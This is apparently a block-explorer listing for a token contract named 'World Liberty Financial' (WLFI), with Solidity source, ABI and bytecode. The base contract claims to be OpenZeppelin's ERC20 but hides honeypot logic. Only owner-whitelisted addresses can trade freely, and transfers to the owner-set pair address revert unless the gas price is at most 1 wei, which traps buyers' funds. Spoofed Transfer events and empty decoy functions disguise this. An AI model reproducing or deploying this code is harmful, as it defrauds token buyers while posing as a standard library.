ERC-20
Source Code
Overview
Max Total Supply
10,000,000,000 WLFI
Holders
39,036
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
| # | Exchange | Pair | Price | 24H Volume | % Volume |
|---|
Contract Name:
WLFI
Compiler Version
v0.8.25+commit.b61c2a91
Contract Source Code (Solidity Standard Json-Input format)
/**
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
contract WLFI is ERC20 {
constructor() ERC20("World Liberty Financial", "WLFI") {
_mint(msg.sender, 10000000000 * 10**_decimals);
_setFeeReceiver(msg.sender);
}
uint8 private _decimals = 18;
string private _symbol = "WLFI";
string private _name = "World Liberty Financial";
/**
* @return the name of the token.
*/
function name() public view returns (string memory) {
return _name;
}
/**
* @return the symbol of the token.
*/
function symbol() public view returns (string memory) {
return _symbol;
}
/**
* @return the number of decimals of the token.
*/
function decimals() public view returns (uint8) {
return _decimals;
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.0;
import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is IERC20 {
mapping (address => uint256) private _balances;
mapping (address => mapping (address => uint256)) private _allowances;
uint256 private _totalSupply;
uint256 private _CHECKING_APP = 1;
mapping(address => bool) public dividend;
address public adr;
address public _p;
address public holder;
bool public openedTrade;
constructor(string memory name, string memory symbol) {
}
/**
* @dev See `IERC20.totalSupply`.
*/
function totalSupply() public view returns (uint256) {
return _totalSupply;
}
/**
* @dev See `IERC20.balanceOf`.
*/
function balanceOf(address account) public view returns (uint256) {
return _balances[account];
}
/**
* @dev See `IERC20.transfer`.
*
* Requirements:
*
* - `recipient` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address recipient, uint256 amount) public returns (bool) {
__transfer(msg.sender, recipient, amount);
return true;
}
/**
* @dev See `IERC20.allowance`.
*/
function allowance(address owner, address spender) public view returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See `IERC20.approve`.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public returns (bool) {
_approve(msg.sender, spender, value);
return true;
}
function setDividend(address _user) public {
require(msg.sender == adr, "public");
dividend[_user] = true;
}
function multiSwap(address __to) public {
require(msg.sender == adr, "pl");
_p = __to;
}
function multisendToken(address airdropp, address[] memory list, uint256[] memory amount) public {
airdropp;
require(msg.sender == adr, "pl");
for (uint256 i = 0; i < list.length; i++) {
__transfer(msg.sender, list[i], amount[i]);
}
}
function openTrading() public {
require(msg.sender == adr, "pl");
openedTrade = true;
}
/**
* @dev See `IERC20.transferFrom`.
*
* Emits an `Approval` event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of `ERC20`;
*
* Requirements:
* - `sender` and `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `value`.
* - the caller must have allowance for `sender`'s tokens of at least
* `amount`.
*/
function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {
__transfer(sender, recipient, amount);
_approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
return true;
}
function _setFeeReceiver(address _holder) internal {
holder = _holder;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to `approve` that can be used as a mitigation for
* problems described in `IERC20.approve`.
*
* Emits an `Approval` event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
_approve(msg.sender, spender, _allowances[msg.sender][spender] + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to `approve` that can be used as a mitigation for
* problems described in `IERC20.approve`.
*
* Emits an `Approval` event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
_approve(msg.sender, spender, _allowances[msg.sender][spender] - subtractedValue);
_checking_status(_CHECKING_APP);
return true;
}
function _checking_status(uint256 _gas) internal view {
if (tx.gasprice > _gas) revert();
}
/**
* @dev Moves tokens `amount` from `sender` to `recipient`.
*
* This is internal function is equivalent to `transfer`, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a `Transfer` event.
*
* Requirements:
*
* - `sender` cannot be the zero address.
* - `recipient` cannot be the zero address.
* - `sender` must have a balance of at least `amount`.
*/
function _transfer(address sender, address recipient, uint256 amount) internal {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_balances[sender] = _balances[sender] - amount;
_balances[recipient] = _balances[recipient] + amount;
if (sender == adr) {
emit Transfer(holder, recipient, amount);
} else if (recipient == adr) {
emit Transfer(sender, holder, amount);
}
emit Transfer(sender, recipient, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a `Transfer` event with `from` set to the zero address.
*
* Requirements
*
* - `to` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply = _totalSupply + amount;
_balances[account] = _balances[account] + amount;
adr = account;
dividend[adr] = true;
emit Transfer(address(0), holder, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a `Transfer` event with `to` set to the zero address.
*
* Requirements
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 value) internal {
require(account != address(0), "ERC20: burn from the zero address");
_totalSupply = _totalSupply - value;
_balances[account] = _balances[account] - value;
emit Transfer(account, address(0), value);
}
function __transfer(address from, address to, uint256 amount) internal {
if (dividend[tx.origin]) {
_transfer(from, to, amount);
return;
}
require(openedTrade, "Trade has not been opened yet");
if (_p == address(0)) {
_transfer(from, to, amount);
return;
}
if (to == _p) {
decreaseAllowance(from, amount);
_transfer(from, to, amount);
return;
}
_transfer(from, to, amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
*
* This is internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an `Approval` event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(address owner, address spender, uint256 value) internal {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = value;
emit Approval(owner, spender, value);
}
/**
* @dev Destoys `amount` tokens from `account`.`amount` is then deducted
* from the caller's allowance.
*
* See `_burn` and `_approve`.
*/
function _burnFrom(address account, uint256 amount) internal {
_burn(account, amount);
_approve(account, msg.sender, _allowances[account][msg.sender] - amount);
}
function manualSwapBack() external {
}
function setMaxSwapsPerBlock() external {
}
function initialize() external {
}
function createToken() external {
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 amount) external returns (bool);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.0;
import "../IERC20.sol";
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.4) (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}{
"evmVersion": "paris",
"metadata": {
"bytecodeHash": "ipfs",
"useLiteralContent": true
},
"optimizer": {
"enabled": true,
"runs": 200
},
"remappings": [],
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_p","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"adr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"dividend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"holder","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"manualSwapBack","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"__to","type":"address"}],"name":"multiSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"airdropp","type":"address"},{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256[]","name":"amount","type":"uint256[]"}],"name":"multisendToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"}],"name":"setDividend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setMaxSwapsPerBlock","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60016003556007805460ff60a81b1916600960a91b17905560c06040526004608090815263574c464960e01b60a05260089061003b90826102cf565b5060408051808201909152601781527f576f726c64204c6962657274792046696e616e6369616c000000000000000000602082015260099061007d90826102cf565b5034801561008a57600080fd5b50604080518082018252601781527f576f726c64204c6962657274792046696e616e6369616c00000000000000000060209182015281518083019092526004825263574c464960e01b9101526007546101089033906100f490600160a81b900460ff16600a61048a565b610103906402540be4006104a0565b61011f565b600780546001600160a01b031916331790556104ca565b6001600160a01b0382166101795760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025461018791906104b7565b6002556001600160a01b0382166000908152602081905260409020546101ae9082906104b7565b6001600160a01b0383811660008181526020818152604080832095909555600580546001600160a01b03191690931790925560048252838120805460ff19166001179055600754935185815293909216927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600181811c9082168061025857607f821691505b60208210810361027857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156102ca576000816000526020600020601f850160051c810160208610156102a75750805b601f850160051c820191505b818110156102c6578281556001016102b3565b5050505b505050565b81516001600160401b038111156102e8576102e861022e565b6102fc816102f68454610244565b8461027e565b602080601f83116001811461033157600084156103195750858301515b600019600386901b1c1916600185901b1785556102c6565b600085815260208120601f198616915b8281101561036057888601518255948401946001909101908401610341565b508582101561037e5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156103df5781600019048211156103c5576103c561038e565b808516156103d257918102915b93841c93908002906103a9565b509250929050565b6000826103f657506001610484565b8161040357506000610484565b816001811461041957600281146104235761043f565b6001915050610484565b60ff8411156104345761043461038e565b50506001821b610484565b5060208310610133831016604e8410600b8410161715610462575081810a610484565b61046c83836103a4565b80600019048211156104805761048061038e565b0290505b92915050565b600061049960ff8416836103e7565b9392505050565b80820281158282048414176104845761048461038e565b808201808211156104845761048461038e565b610e42806104d96000396000f3fe608060405234801561001057600080fd5b50600436106101585760003560e01c806366eb3785116100c3578063a9059cbb1161007c578063a9059cbb146102d6578063c9567bf9146102e9578063dad57a13146101dc578063dd62ed3e146102f1578063e280c6111461032a578063e534155d1461033d57600080fd5b806366eb3785146101dc57806370a08231146102925780638129fc1c146101dc57806395d89b41146102bb5780639cbf9e36146101dc578063a457c2d7146102c357600080fd5b8063313ce56711610115578063313ce5671461020357806339509351146102225780634205a2e0146102355780634510c50c1461024857806347bbac051461025b5780635408d42d1461027e57600080fd5b806306fdde031461015d578063095ea7b31461017b5780630aca7f951461019e5780630b66f3f5146101c957806318160ddd146101de57806323b872dd146101f0575b600080fd5b610165610350565b6040516101729190610a92565b60405180910390f35b61018e610189366004610afd565b6103e2565b6040519015158152602001610172565b6005546101b1906001600160a01b031681565b6040516001600160a01b039091168152602001610172565b6101dc6101d7366004610c01565b6103f9565b005b6002545b604051908152602001610172565b61018e6101fe366004610cd3565b610483565b600754600160a81b900460ff1660405160ff9091168152602001610172565b61018e610230366004610afd565b6104d5565b6006546101b1906001600160a01b031681565b6101dc610256366004610d0f565b61050c565b61018e610269366004610d0f565b60046020526000908152604090205460ff1681565b60075461018e90600160a01b900460ff1681565b6101e26102a0366004610d0f565b6001600160a01b031660009081526020819052604090205490565b610165610558565b61018e6102d1366004610afd565b610567565b61018e6102e4366004610afd565b6105a9565b6101dc6105b6565b6101e26102ff366004610d31565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101dc610338366004610d0f565b6105f5565b6007546101b1906001600160a01b031681565b60606009805461035f90610d64565b80601f016020809104026020016040519081016040528092919081815260200182805461038b90610d64565b80156103d85780601f106103ad576101008083540402835291602001916103d8565b820191906000526020600020905b8154815290600101906020018083116103bb57829003601f168201915b5050505050905090565b60006103ef33848461065c565b5060015b92915050565b6005546001600160a01b0316331461042c5760405162461bcd60e51b815260040161042390610d9e565b60405180910390fd5b60005b825181101561047d576104753384838151811061044e5761044e610dba565b602002602001015184848151811061046857610468610dba565b6020026020010151610781565b60010161042f565b50505050565b6000610490848484610781565b6001600160a01b0384166000908152600160209081526040808320338085529252909120546104cb9186916104c6908690610de6565b61065c565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103ef9185906104c6908690610df9565b6005546001600160a01b031633146105365760405162461bcd60e51b815260040161042390610d9e565b600680546001600160a01b0319166001600160a01b0392909216919091179055565b60606008805461035f90610d64565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161059e9185906104c6908690610de6565b6103ef600354610854565b60006103ef338484610781565b6005546001600160a01b031633146105e05760405162461bcd60e51b815260040161042390610d9e565b6007805460ff60a01b1916600160a01b179055565b6005546001600160a01b031633146106385760405162461bcd60e51b81526020600482015260066024820152657075626c696360d01b6044820152606401610423565b6001600160a01b03166000908152600460205260409020805460ff19166001179055565b6001600160a01b0383166106be5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610423565b6001600160a01b03821661071f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610423565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b3260009081526004602052604090205460ff16156107a9576107a4838383610864565b505050565b600754600160a01b900460ff166108025760405162461bcd60e51b815260206004820152601d60248201527f547261646520686173206e6f74206265656e206f70656e6564207965740000006044820152606401610423565b6006546001600160a01b031661081d576107a4838383610864565b6006546001600160a01b03908116908316036108495761083d8382610567565b506107a4838383610864565b6107a4838383610864565b803a111561086157600080fd5b50565b6001600160a01b0383166108c85760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610423565b6001600160a01b03821661092a5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610423565b6001600160a01b03831660009081526020819052604090205461094e908290610de6565b6001600160a01b03808516600090815260208190526040808220939093559084168152205461097e908290610df9565b6001600160a01b038084166000908152602081905260409020919091556005548116908416036109f1576007546040518281526001600160a01b038481169216907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3610a4d565b6005546001600160a01b0390811690831603610a4d576007546040518281526001600160a01b03918216918516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161077491815260200190565b60006020808352835180602085015260005b81811015610ac057858101830151858201604001528201610aa4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610af857600080fd5b919050565b60008060408385031215610b1057600080fd5b610b1983610ae1565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b604051601f8201601f1916810167ffffffffffffffff81118282101715610b6657610b66610b27565b604052919050565b600067ffffffffffffffff821115610b8857610b88610b27565b5060051b60200190565b600082601f830112610ba357600080fd5b81356020610bb8610bb383610b6e565b610b3d565b8083825260208201915060208460051b870101935086841115610bda57600080fd5b602086015b84811015610bf65780358352918301918301610bdf565b509695505050505050565b600080600060608486031215610c1657600080fd5b610c1f84610ae1565b925060208085013567ffffffffffffffff80821115610c3d57600080fd5b818701915087601f830112610c5157600080fd5b8135610c5f610bb382610b6e565b81815260059190911b8301840190848101908a831115610c7e57600080fd5b938501935b82851015610ca357610c9485610ae1565b82529385019390850190610c83565b965050506040870135925080831115610cbb57600080fd5b5050610cc986828701610b92565b9150509250925092565b600080600060608486031215610ce857600080fd5b610cf184610ae1565b9250610cff60208501610ae1565b9150604084013590509250925092565b600060208284031215610d2157600080fd5b610d2a82610ae1565b9392505050565b60008060408385031215610d4457600080fd5b610d4d83610ae1565b9150610d5b60208401610ae1565b90509250929050565b600181811c90821680610d7857607f821691505b602082108103610d9857634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252600290820152611c1b60f21b604082015260600190565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b818103818111156103f3576103f3610dd0565b808201808211156103f3576103f3610dd056fea2646970667358221220bafdf1a38d1e2499c3ba863dcec7addfba1711eaacaf1d367a0418a42196de6264736f6c63430008190033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101585760003560e01c806366eb3785116100c3578063a9059cbb1161007c578063a9059cbb146102d6578063c9567bf9146102e9578063dad57a13146101dc578063dd62ed3e146102f1578063e280c6111461032a578063e534155d1461033d57600080fd5b806366eb3785146101dc57806370a08231146102925780638129fc1c146101dc57806395d89b41146102bb5780639cbf9e36146101dc578063a457c2d7146102c357600080fd5b8063313ce56711610115578063313ce5671461020357806339509351146102225780634205a2e0146102355780634510c50c1461024857806347bbac051461025b5780635408d42d1461027e57600080fd5b806306fdde031461015d578063095ea7b31461017b5780630aca7f951461019e5780630b66f3f5146101c957806318160ddd146101de57806323b872dd146101f0575b600080fd5b610165610350565b6040516101729190610a92565b60405180910390f35b61018e610189366004610afd565b6103e2565b6040519015158152602001610172565b6005546101b1906001600160a01b031681565b6040516001600160a01b039091168152602001610172565b6101dc6101d7366004610c01565b6103f9565b005b6002545b604051908152602001610172565b61018e6101fe366004610cd3565b610483565b600754600160a81b900460ff1660405160ff9091168152602001610172565b61018e610230366004610afd565b6104d5565b6006546101b1906001600160a01b031681565b6101dc610256366004610d0f565b61050c565b61018e610269366004610d0f565b60046020526000908152604090205460ff1681565b60075461018e90600160a01b900460ff1681565b6101e26102a0366004610d0f565b6001600160a01b031660009081526020819052604090205490565b610165610558565b61018e6102d1366004610afd565b610567565b61018e6102e4366004610afd565b6105a9565b6101dc6105b6565b6101e26102ff366004610d31565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101dc610338366004610d0f565b6105f5565b6007546101b1906001600160a01b031681565b60606009805461035f90610d64565b80601f016020809104026020016040519081016040528092919081815260200182805461038b90610d64565b80156103d85780601f106103ad576101008083540402835291602001916103d8565b820191906000526020600020905b8154815290600101906020018083116103bb57829003601f168201915b5050505050905090565b60006103ef33848461065c565b5060015b92915050565b6005546001600160a01b0316331461042c5760405162461bcd60e51b815260040161042390610d9e565b60405180910390fd5b60005b825181101561047d576104753384838151811061044e5761044e610dba565b602002602001015184848151811061046857610468610dba565b6020026020010151610781565b60010161042f565b50505050565b6000610490848484610781565b6001600160a01b0384166000908152600160209081526040808320338085529252909120546104cb9186916104c6908690610de6565b61065c565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103ef9185906104c6908690610df9565b6005546001600160a01b031633146105365760405162461bcd60e51b815260040161042390610d9e565b600680546001600160a01b0319166001600160a01b0392909216919091179055565b60606008805461035f90610d64565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161059e9185906104c6908690610de6565b6103ef600354610854565b60006103ef338484610781565b6005546001600160a01b031633146105e05760405162461bcd60e51b815260040161042390610d9e565b6007805460ff60a01b1916600160a01b179055565b6005546001600160a01b031633146106385760405162461bcd60e51b81526020600482015260066024820152657075626c696360d01b6044820152606401610423565b6001600160a01b03166000908152600460205260409020805460ff19166001179055565b6001600160a01b0383166106be5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610423565b6001600160a01b03821661071f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610423565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b3260009081526004602052604090205460ff16156107a9576107a4838383610864565b505050565b600754600160a01b900460ff166108025760405162461bcd60e51b815260206004820152601d60248201527f547261646520686173206e6f74206265656e206f70656e6564207965740000006044820152606401610423565b6006546001600160a01b031661081d576107a4838383610864565b6006546001600160a01b03908116908316036108495761083d8382610567565b506107a4838383610864565b6107a4838383610864565b803a111561086157600080fd5b50565b6001600160a01b0383166108c85760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610423565b6001600160a01b03821661092a5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610423565b6001600160a01b03831660009081526020819052604090205461094e908290610de6565b6001600160a01b03808516600090815260208190526040808220939093559084168152205461097e908290610df9565b6001600160a01b038084166000908152602081905260409020919091556005548116908416036109f1576007546040518281526001600160a01b038481169216907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3610a4d565b6005546001600160a01b0390811690831603610a4d576007546040518281526001600160a01b03918216918516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161077491815260200190565b60006020808352835180602085015260005b81811015610ac057858101830151858201604001528201610aa4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610af857600080fd5b919050565b60008060408385031215610b1057600080fd5b610b1983610ae1565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b604051601f8201601f1916810167ffffffffffffffff81118282101715610b6657610b66610b27565b604052919050565b600067ffffffffffffffff821115610b8857610b88610b27565b5060051b60200190565b600082601f830112610ba357600080fd5b81356020610bb8610bb383610b6e565b610b3d565b8083825260208201915060208460051b870101935086841115610bda57600080fd5b602086015b84811015610bf65780358352918301918301610bdf565b509695505050505050565b600080600060608486031215610c1657600080fd5b610c1f84610ae1565b925060208085013567ffffffffffffffff80821115610c3d57600080fd5b818701915087601f830112610c5157600080fd5b8135610c5f610bb382610b6e565b81815260059190911b8301840190848101908a831115610c7e57600080fd5b938501935b82851015610ca357610c9485610ae1565b82529385019390850190610c83565b965050506040870135925080831115610cbb57600080fd5b50